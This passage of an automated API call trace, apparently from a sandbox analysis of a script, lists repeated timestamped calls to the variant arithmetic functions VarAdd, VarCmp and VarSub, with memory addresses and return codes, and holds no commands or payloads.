(pvarLeft=0x6b7e8d0, pvarRight=0x6b7dd58, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.155] VarAdd (in: pvarLeft=0x6b7dc68, pvarRight=0x6b7dc98, pvarResult=0x6b7dc80 | out: pvarResult=0x6b7dc80) returned 0x0 [0042.155] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7dce8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.155] VarAdd (in: pvarLeft=0x6b7e8d0, pvarRight=0x6b7dd40, pvarResult=0x6b7dd18 | out: pvarResult=0x6b7dd18) returned 0x0 [0042.155] VarCmp (pvarLeft=0x6b7e8d0, pvarRight=0x6b7dc98, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.155] VarAdd (in: pvarLeft=0x6b7dba8, pvarRight=0x6b7dbd8, pvarResult=0x6b7dbc0 | out: pvarResult=0x6b7dbc0) returned 0x0 [0042.155] VarCmp (pvarLeft=0x6b7e978, pvarRight=0x6b7dc28, lcid=0x0, dwFlags=0x30001) returned 0x1 [0042.155] VarSub (in: pvarLeft=0x6b7e960, pvarRight=0x6b7e9c0, pvarResult=0x6b7e9a8 | out: pvarResult=0x6b7e9a8) returned 0x0 [0042.155] VarCmp (pvarLeft=0x6b7e930, pvarRight=0x6b7e8e0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.155] VarCmp (pvarLeft=0x6b7e930, pvarRight=0x6b7e8e0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.155] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e820, pvarResult=0x6b7e808 | out: pvarResult=0x6b7e808) returned 0x0 [0042.155] VarAdd (in: pvarLeft=0x6b7e9c0, pvarRight=0x6b7e948, pvarResult=0x6b7e9a8 | out: pvarResult=0x6b7e9a8) returned 0x0 [0042.155] VarAdd (in: pvarLeft=0x6b7ec98, pvarRight=0x6b7e9c0, pvarResult=0x6b7e9a8 | out: pvarResult=0x6b7e9a8) returned 0x0 [0042.155] VarCmp (pvarLeft=0x6b7ec98, pvarRight=0x6b7e8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.156] VarAdd (in: pvarLeft=0x6b7e7d0, pvarRight=0x6b7e800, pvarResult=0x6b7e7e8 | out: pvarResult=0x6b7e7e8) returned 0x0 [0042.156] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e7b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.156] VarAdd (in: pvarLeft=0x6b7e6c8, pvarRight=0x6b7e6f8, pvarResult=0x6b7e6e0 | out: pvarResult=0x6b7e6e0) returned 0x0 [0042.156] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e748, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.156] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e7a0, pvarResult=0x6b7e778 | out: pvarResult=0x6b7e778) returned 0x0 [0042.156] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e6f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.156] VarAdd (in: pvarLeft=0x6b7e608, pvarRight=0x6b7e638, pvarResult=0x6b7e620 | out: pvarResult=0x6b7e620) returned 0x0 [0042.156] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e688, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.156] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e6e0, pvarResult=0x6b7e6b8 | out: pvarResult=0x6b7e6b8) returned 0x0 [0042.156] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e638, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.156] VarAdd (in: pvarLeft=0x6b7e548, pvarRight=0x6b7e578, pvarResult=0x6b7e560 | out: pvarResult=0x6b7e560) returned 0x0 [0042.156] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e5c8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.156] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e620, pvarResult=0x6b7e5f8 | out: pvarResult=0x6b7e5f8) returned 0x0 [0042.156] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e578, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.156] VarAdd (in: pvarLeft=0x6b7e488, pvarRight=0x6b7e4b8, pvarResult=0x6b7e4a0 | out: pvarResult=0x6b7e4a0) returned 0x0 [0042.156] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e508, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.156] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e560, pvarResult=0x6b7e538 | out: pvarResult=0x6b7e538) returned 0x0 [0042.157] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e4b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.157] VarAdd (in: pvarLeft=0x6b7e3c8, pvarRight=0x6b7e3f8, pvarResult=0x6b7e3e0 | out: pvarResult=0x6b7e3e0) returned 0x0 [0042.157] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e448, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.157] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e4a0, pvarResult=0x6b7e478 | out: pvarResult=0x6b7e478) returned 0x0 [0042.157] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e3f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.157] VarAdd (in: pvarLeft=0x6b7e308, pvarRight=0x6b7e338, pvarResult=0x6b7e320 | out: pvarResult=0x6b7e320) returned 0x0 [0042.157] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e388, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.157] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e3e0, pvarResult=0x6b7e3b8 | out: pvarResult=0x6b7e3b8) returned 0x0 [0042.157] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e338, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.157] VarAdd (in: pvarLeft=0x6b7e248, pvarRight=0x6b7e278, pvarResult=0x6b7e260 | out: pvarResult=0x6b7e260) returned 0x0 [0042.157] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e2c8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.157] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e320, pvarResult=0x6b7e2f8 | out: pvarResult=0x6b7e2f8) returned 0x0 [0042.157] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e278, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.157] VarAdd (in: pvarLeft=0x6b7e188, pvarRight=0x6b7e1b8, pvarResult=0x6b7e1a0 | out: pvarResult=0x6b7e1a0) returned 0x0 [0042.157] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e208, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.157] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e260, pvarResult=0x6b7e238 | out: pvarResult=0x6b7e238) returned 0x0 [0042.157] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e1b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.157] VarAdd (in: pvarLeft=0x6b7e0c8, pvarRight=0x6b7e0f8, pvarResult=0x6b7e0e0 | out: pvarResult=0x6b7e0e0) returned 0x0 [0042.158] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e148, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.158] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e1a0, pvarResult=0x6b7e178 | out: pvarResult=0x6b7e178) returned 0x0 [0042.158] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e0f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.158] VarAdd (in: pvarLeft=0x6b7e008, pvarRight=0x6b7e038, pvarResult=0x6b7e020 | out: pvarResult=0x6b7e020) returned 0x0 [0042.158] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7e088, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.158] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e0e0, pvarResult=0x6b7e0b8 | out: pvarResult=0x6b7e0b8) returned 0x0 [0042.158] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7e038, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.158] VarAdd (in: pvarLeft=0x6b7df48, pvarRight=0x6b7df78, pvarResult=0x6b7df60 | out: pvarResult=0x6b7df60) returned 0x0 [0042.158] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7dfc8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.158] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7e020, pvarResult=0x6b7dff8 | out: pvarResult=0x6b7dff8) returned 0x0 [0042.158] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7df78, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.158] VarAdd (in: pvarLeft=0x6b7de88, pvarRight=0x6b7deb8, pvarResult=0x6b7dea0 | out: pvarResult=0x6b7dea0) returned 0x0 [0042.158] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7df08, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.158] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7df60, pvarResult=0x6b7df38 | out: pvarResult=0x6b7df38) returned 0x0 [0042.158] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7deb8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.158] VarAdd (in: pvarLeft=0x6b7ddc8, pvarRight=0x6b7ddf8, pvarResult=0x6b7dde0 | out: pvarResult=0x6b7dde0) returned 0x0 [0042.158] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7de48, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.158] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7dea0, pvarResult=0x6b7de78 | out: pvarResult=0x6b7de78) returned 0x0 [0042.159] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7ddf8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.159] VarAdd (in: pvarLeft=0x6b7dd08, pvarRight=0x6b7dd38, pvarResult=0x6b7dd20 | out: pvarResult=0x6b7dd20) returned 0x0 [0042.159] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7dd88, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.159] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7dde0, pvarResult=0x6b7ddb8 | out: pvarResult=0x6b7ddb8) returned 0x0 [0042.159] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7dd38, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.159] VarAdd (in: pvarLeft=0x6b7dc48, pvarRight=0x6b7dc78, pvarResult=0x6b7dc60 | out: pvarResult=0x6b7dc60) returned 0x0 [0042.159] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7dcc8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.159] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7dd20, pvarResult=0x6b7dcf8 | out: pvarResult=0x6b7dcf8) returned 0x0 [0042.159] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7dc78, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.159] VarAdd (in: pvarLeft=0x6b7db88, pvarRight=0x6b7dbb8, pvarResult=0x6b7dba0 | out: pvarResult=0x6b7dba0) returned 0x0 [0042.159] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7dc08, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.159] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7dc60, pvarResult=0x6b7dc38 | out: pvarResult=0x6b7dc38) returned 0x0 [0042.159] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7dbb8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.159] VarAdd (in: pvarLeft=0x6b7dac8, pvarRight=0x6b7daf8, pvarResult=0x6b7dae0 | out: pvarResult=0x6b7dae0) returned 0x0 [0042.159] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7db48, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.159] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7dba0, pvarResult=0x6b7db78 | out: pvarResult=0x6b7db78) returned 0x0 [0042.159] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7daf8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.160] VarAdd (in: pvarLeft=0x6b7da08, pvarRight=0x6b7da38, pvarResult=0x6b7da20 | out: pvarResult=0x6b7da20) returned 0x0 [0042.160] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7da88, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.160] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7dae0, pvarResult=0x6b7dab8 | out: pvarResult=0x6b7dab8) returned 0x0 [0042.160] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7da38, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.160] VarAdd (in: pvarLeft=0x6b7d948, pvarRight=0x6b7d978, pvarResult=0x6b7d960 | out: pvarResult=0x6b7d960) returned 0x0 [0042.160] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d9c8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.160] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7da20, pvarResult=0x6b7d9f8 | out: pvarResult=0x6b7d9f8) returned 0x0 [0042.160] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d978, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.160] VarAdd (in: pvarLeft=0x6b7d888, pvarRight=0x6b7d8b8, pvarResult=0x6b7d8a0 | out: pvarResult=0x6b7d8a0) returned 0x0 [0042.160] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d908, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.160] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7d960, pvarResult=0x6b7d938 | out: pvarResult=0x6b7d938) returned 0x0 [0042.160] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d8b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.160] VarAdd (in: pvarLeft=0x6b7d7c8, pvarRight=0x6b7d7f8, pvarResult=0x6b7d7e0 | out: pvarResult=0x6b7d7e0) returned 0x0 [0042.160] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d848, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.160] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7d8a0, pvarResult=0x6b7d878 | out: pvarResult=0x6b7d878) returned 0x0 [0042.160] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d7f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.160] VarAdd (in: pvarLeft=0x6b7d708, pvarRight=0x6b7d738, pvarResult=0x6b7d720 | out: pvarResult=0x6b7d720) returned 0x0 [0042.160] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d788, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.161] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7d7e0, pvarResult=0x6b7d7b8 | out: pvarResult=0x6b7d7b8) returned 0x0 [0042.161] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d738, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.161] VarAdd (in: pvarLeft=0x6b7d648, pvarRight=0x6b7d678, pvarResult=0x6b7d660 | out: pvarResult=0x6b7d660) returned 0x0 [0042.161] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d6c8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.161] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7d720, pvarResult=0x6b7d6f8 | out: pvarResult=0x6b7d6f8) returned 0x0 [0042.161] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d678, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.161] VarAdd (in: pvarLeft=0x6b7d588, pvarRight=0x6b7d5b8, pvarResult=0x6b7d5a0 | out: pvarResult=0x6b7d5a0) returned 0x0 [0042.161] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d608, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.161] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7d660, pvarResult=0x6b7d638 | out: pvarResult=0x6b7d638) returned 0x0 [0042.161] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d5b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.161] VarAdd (in: pvarLeft=0x6b7d4c8, pvarRight=0x6b7d4f8, pvarResult=0x6b7d4e0 | out: pvarResult=0x6b7d4e0) returned 0x0 [0042.161] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d548, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.161] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7d5a0, pvarResult=0x6b7d578 | out: pvarResult=0x6b7d578) returned 0x0 [0042.161] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d4f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.161] VarAdd (in: pvarLeft=0x6b7d408, pvarRight=0x6b7d438, pvarResult=0x6b7d420 | out: pvarResult=0x6b7d420) returned 0x0 [0042.162] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d488, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.162] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7d4e0, pvarResult=0x6b7d4b8 | out: pvarResult=0x6b7d4b8) returned 0x0 [0042.162] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d438, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.162] VarAdd (in: pvarLeft=0x6b7d348, pvarRight=0x6b7d378, pvarResult=0x6b7d360 | out: pvarResult=0x6b7d360) returned 0x0 [0042.162] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d3c8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.162] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7d420, pvarResult=0x6b7d3f8 | out: pvarResult=0x6b7d3f8) returned 0x0 [0042.162] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d378, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.162] VarAdd (in: pvarLeft=0x6b7d288, pvarRight=0x6b7d2b8, pvarResult=0x6b7d2a0 | out: pvarResult=0x6b7d2a0) returned 0x0 [0042.162] VarCmp (pvarLeft=0x6b7e898, pvarRight=0x6b7d308, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.162] VarAdd (in: pvarLeft=0x6b7e7f0, pvarRight=0x6b7d360, pvarResult=0x6b7d338 | out: pvarResult=0x6b7d338) returned 0x0 [0042.162] VarCmp (pvarLeft=0x6b7e7f0, pvarRight=0x6b7d2b8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.163] VarSub (in: pvarLeft=0x6b7e880, pvarRight=0x6b7e8e0, pvarResult=0x6b7e8c8 | out: pvarResult=0x6b7e8c8) returned 0x0 [0042.164] VarSub (in: pvarLeft=0x6b7e7a0, pvarRight=0x6b7e800, pvarResult=0x6b7e7e8 | out: pvarResult=0x6b7e7e8) returned 0x0 [0042.165] VarSub (in: pvarLeft=0x6b7e6c0, pvarRight=0x6b7e720, pvarResult=0x6b7e708 | out: pvarResult=0x6b7e708) returned 0x0 [0042.166] VarSub (in: pvarLeft=0x6b7e5e0, pvarRight=0x6b7e640, pvarResult=0x6b7e628 | out: pvarResult=0x6b7e628) returned 0x0 [0042.166] VarSub (in: pvarLeft=0x6b7e500, pvarRight=0x6b7e560, pvarResult=0x6b7e548 | out: pvarResult=0x6b7e548) returned 0x0 [0042.166] VarSub (in: pvarLeft=0x6b7e420, pvarRight=0x6b7e480, pvarResult=0x6b7e468 | out: pvarResult=0x6b7e468) returned 0x0 [0042.166] VarSub (in: pvarLeft=0x6b7e340, pvarRight=0x6b7e3a0, pvarResult=0x6b7e388 | out: pvarResult=0x6b7e388) returned 0x0 [0042.166] VarSub (in: pvarLeft=0x6b7e260, pvarRight=0x6b7e2c0, pvarResult=0x6b7e2a8 | out: pvarResult=0x6b7e2a8) returned 0x0 [0042.167] VarSub (in: pvarLeft=0x6b7e180, pvarRight=0x6b7e1e0, pvarResult=0x6b7e1c8 | out: pvarResult=0x6b7e1c8) returned 0x0 [0042.167] VarSub (in: pvarLeft=0x6b7e0a0, pvarRight=0x6b7e100, pvarResult=0x6b7e0e8 | out: pvarResult=0x6b7e0e8) returned 0x0 [0042.167] VarSub (in: pvarLeft=0x6b7dfc0, pvarRight=0x6b7e020, pvarResult=0x6b7e008 | out: pvarResult=0x6b7e008) returned 0x0 [0042.167] VarSub (in: pvarLeft=0x6b7dee0, pvarRight=0x6b7df40, pvarResult=0x6b7df28 | out: pvarResult=0x6b7df28) returned 0x0 [0042.167] VarSub (in: pvarLeft=0x6b7de00, pvarRight=0x6b7de60, pvarResult=0x6b7de48 | out: pvarResult=0x6b7de48) returned 0x0 [0042.167] VarSub (in: pvarLeft=0x6b7dd20, pvarRight=0x6b7dd80, pvarResult=0x6b7dd68 | out: pvarResult=0x6b7dd68) returned 0x0 [0042.167] VarSub (in: pvarLeft=0x6b7dc40, pvarRight=0x6b7dca0, pvarResult=0x6b7dc88 | out: pvarResult=0x6b7dc88) returned 0x0 [0042.168] VarSub (in: pvarLeft=0x6b7db60, pvarRight=0x6b7dbc0, pvarResult=0x6b7dba8 | out: pvarResult=0x6b7dba8) returned 0x0 [0042.168] VarSub (in: pvarLeft=0x6b7da80, pvarRight=0x6b7dae0, pvarResult=0x6b7dac8 | out: pvarResult=0x6b7dac8) returned 0x0 [0042.168] VarSub (in: pvarLeft=0x6b7d9a0, pvarRight=0x6b7da00, pvarResult=0x6b7d9e8 | out: pvarResult=0x6b7d9e8) returned 0x0 [0042.168] VarSub (in: pvarLeft=0x6b7d8c0, pvarRight=0x6b7d920, pvarResult=0x6b7d908 | out: pvarResult=0x6b7d908) returned 0x0 [0042.168] VarSub (in: pvarLeft=0x6b7d7e0, pvarRight=0x6b7d840, pvarResult=0x6b7d828 | out: pvarResult=0x6b7d828) returned 0x0 [0042.168] VarSub (in: pvarLeft=0x6b7d700, pvarRight=0x6b7d760, pvarResult=0x6b7d748 | out: pvarResult=0x6b7d748) returned 0x0 [0042.168] VarSub (in: pvarLeft=0x6b7d620, pvarRight=0x6b7d680, pvarResult=0x6b7d668 | out: pvarResult=0x6b7d668) returned 0x0 [0042.168] VarSub (in: pvarLeft=0x6b7d540, pvarRight=0x6b7d5a0, pvarResult=0x6b7d588 | out: pvarResult=0x6b7d588) returned 0x0 [0042.168] VarSub (in: pvarLeft=0x6b7d460, pvarRight=0x6b7d4c0, pvarResult=0x6b7d4a8 | out: pvarResult=0x6b7d4a8) returned 0x0 [0042.169] VarSub (in: pvarLeft=0x6b7d380, pvarRight=0x6b7d3e0, pvarResult=0x6b7d3c8 | out: pvarResult=0x6b7d3c8) returned 0x0 [0042.169] VarSub (in: pvarLeft=0x6b7d2a0, pvarRight=0x6b7d300, pvarResult=0x6b7d2e8 | out: pvarResult=0x6b7d2e8) returned 0x0 [0042.169] VarSub (in: pvarLeft=0x6b7d1c0, pvarRight=0x6b7d220, pvarResult=0x6b7d208 | out: pvarResult=0x6b7d208) returned 0x0 [0042.169] VarSub (in: pvarLeft=0x6b7d0e0, pvarRight=0x6b7d140, pvarResult=0x6b7d128 | out: pvarResult=0x6b7d128) returned 0x0 [0042.169] VarSub (in: pvarLeft=0x6b7d000, pvarRight=0x6b7d060, pvarResult=0x6b7d048 | out: pvarResult=0x6b7d048) returned 0x0 [0042.169] VarSub (in: pvarLeft=0x6b7cf20, pvarRight=0x6b7cf80, pvarResult=0x6b7cf68 | out: pvarResult=0x6b7cf68) returned 0x0 [0042.169] VarSub (in: pvarLeft=0x6b7ce40, pvarRight=0x6b7cea0, pvarResult=0x6b7ce88 | out: pvarResult=0x6b7ce88) returned 0x0 [0042.170] VarSub (in: pvarLeft=0x6b7cd60, pvarRight=0x6b7cdc0, pvarResult=0x6b7cda8 | out: pvarResult=0x6b7cda8) returned 0x0 [0042.170] VarSub (in: pvarLeft=0x6b7cc80, pvarRight=0x6b7cce0, pvarResult=0x6b7ccc8 | out: pvarResult=0x6b7ccc8) returned 0x0 [0042.170] VarSub (in: pvarLeft=0x6b7cba0, pvarRight=0x6b7cc00, pvarResult=0x6b7cbe8 | out: pvarResult=0x6b7cbe8) returned 0x0 [0042.170] VarSub (in: pvarLeft=0x6b7cac0, pvarRight=0x6b7cb20, pvarResult=0x6b7cb08 | out: pvarResult=0x6b7cb08) returned 0x0 [0042.170] VarSub (in: pvarLeft=0x6b7c9e0, pvarRight=0x6b7ca40, pvarResult=0x6b7ca28 | out: pvarResult=0x6b7ca28) returned 0x0 [0042.170] VarSub (in: pvarLeft=0x6b7c900, pvarRight=0x6b7c960, pvarResult=0x6b7c948 | out: pvarResult=0x6b7c948) returned 0x0 [0042.171] VarSub (in: pvarLeft=0x6b7c820, pvarRight=0x6b7c880, pvarResult=0x6b7c868 | out: pvarResult=0x6b7c868) returned 0x0 [0042.171] VarSub (in: pvarLeft=0x6b7c740, pvarRight=0x6b7c7a0, pvarResult=0x6b7c788 | out: pvarResult=0x6b7c788) returned 0x0 [0042.171] VarSub (in: pvarLeft=0x6b7c660, pvarRight=0x6b7c6c0, pvarResult=0x6b7c6a8 | out: pvarResult=0x6b7c6a8) returned 0x0 [0042.171] VarSub (in: pvarLeft=0x6b7c580, pvarRight=0x6b7c5e0, pvarResult=0x6b7c5c8 | out: pvarResult=0x6b7c5c8) returned 0x0 [0042.171] VarSub (in: pvarLeft=0x6b7c4a0, pvarRight=0x6b7c500, pvarResult=0x6b7c4e8 | out: pvarResult=0x6b7c4e8) returned 0x0 [0042.171] VarSub (in: pvarLeft=0x6b7c3c0, pvarRight=0x6b7c420, pvarResult=0x6b7c408 | out: pvarResult=0x6b7c408) returned 0x0 [0042.172] VarSub (in: pvarLeft=0x6b7c2e0, pvarRight=0x6b7c340, pvarResult=0x6b7c328 | out: pvarResult=0x6b7c328) returned 0x0 [0042.172] VarSub (in: pvarLeft=0x6b7c200, pvarRight=0x6b7c260, pvarResult=0x6b7c248 | out: pvarResult=0x6b7c248) returned 0x0 [0042.172] VarSub (in: pvarLeft=0x6b7c120, pvarRight=0x6b7c180, pvarResult=0x6b7c168 | out: pvarResult=0x6b7c168) returned 0x0 [0042.172] VarSub (in: pvarLeft=0x6b7c040, pvarRight=0x6b7c0a0, pvarResult=0x6b7c088 | out: pvarResult=0x6b7c088) returned 0x0 [0042.172] VarSub (in: pvarLeft=0x6b7bf60, pvarRight=0x6b7bfc0, pvarResult=0x6b7bfa8 | out: pvarResult=0x6b7bfa8) returned 0x0 [0042.172] VarSub (in: pvarLeft=0x6b7be80, pvarRight=0x6b7bee0, pvarResult=0x6b7bec8 | out: pvarResult=0x6b7bec8) returned 0x0 [0042.172] VarSub (in: pvarLeft=0x6b7bda0, pvarRight=0x6b7be00, pvarResult=0x6b7bde8 | out: pvarResult=0x6b7bde8) returned 0x0 [0042.172] VarSub (in: pvarLeft=0x6b7bcc0, pvarRight=0x6b7bd20, pvarResult=0x6b7bd08 | out: pvarResult=0x6b7bd08) returned 0x0 [0042.173] VarSub (in: pvarLeft=0x6b7bbe0, pvarRight=0x6b7bc40, pvarResult=0x6b7bc28 | out: pvarResult=0x6b7bc28) returned 0x0 [0042.173] VarSub (in: pvarLeft=0x6b7bb00, pvarRight=0x6b7bb60, pvarResult=0x6b7bb48 | out: pvarResult=0x6b7bb48) returned 0x0 [0042.173] VarSub (in: pvarLeft=0x6b7ba20, pvarRight=0x6b7ba80, pvarResult=0x6b7ba68 | out: pvarResult=0x6b7ba68) returned 0x0 [0042.173] VarSub (in: pvarLeft=0x6b7b940, pvarRight=0x6b7b9a0, pvarResult=0x6b7b988 | out: pvarResult=0x6b7b988) returned 0x0 [0042.173] VarSub (in: pvarLeft=0x6b7b860, pvarRight=0x6b7b8c0, pvarResult=0x6b7b8a8 | out: pvarResult=0x6b7b8a8) returned 0x0 [0042.173] VarSub (in: pvarLeft=0x6b7b780, pvarRight=0x6b7b7e0, pvarResult=0x6b7b7c8 | out: pvarResult=0x6b7b7c8) returned 0x0 [0042.174] VarSub (in: pvarLeft=0x6b7b6a0, pvarRight=0x6b7b700, pvarResult=0x6b7b6e8 | out: pvarResult=0x6b7b6e8) returned 0x0 [0042.174] VarSub (in: pvarLeft=0x6b7b5c0, pvarRight=0x6b7b620, pvarResult=0x6b7b608 | out: pvarResult=0x6b7b608) returned 0x0 [0042.174] VarSub (in: pvarLeft=0x6b7b4e0, pvarRight=0x6b7b540, pvarResult=0x6b7b528 | out: pvarResult=0x6b7b528) returned 0x0 [0042.174] VarSub (in: pvarLeft=0x6b7b400, pvarRight=0x6b7b460, pvarResult=0x6b7b448 | out: pvarResult=0x6b7b448) returned 0x0 [0042.174] VarSub (in: pvarLeft=0x6b7b320, pvarRight=0x6b7b380, pvarResult=0x6b7b368 | out: 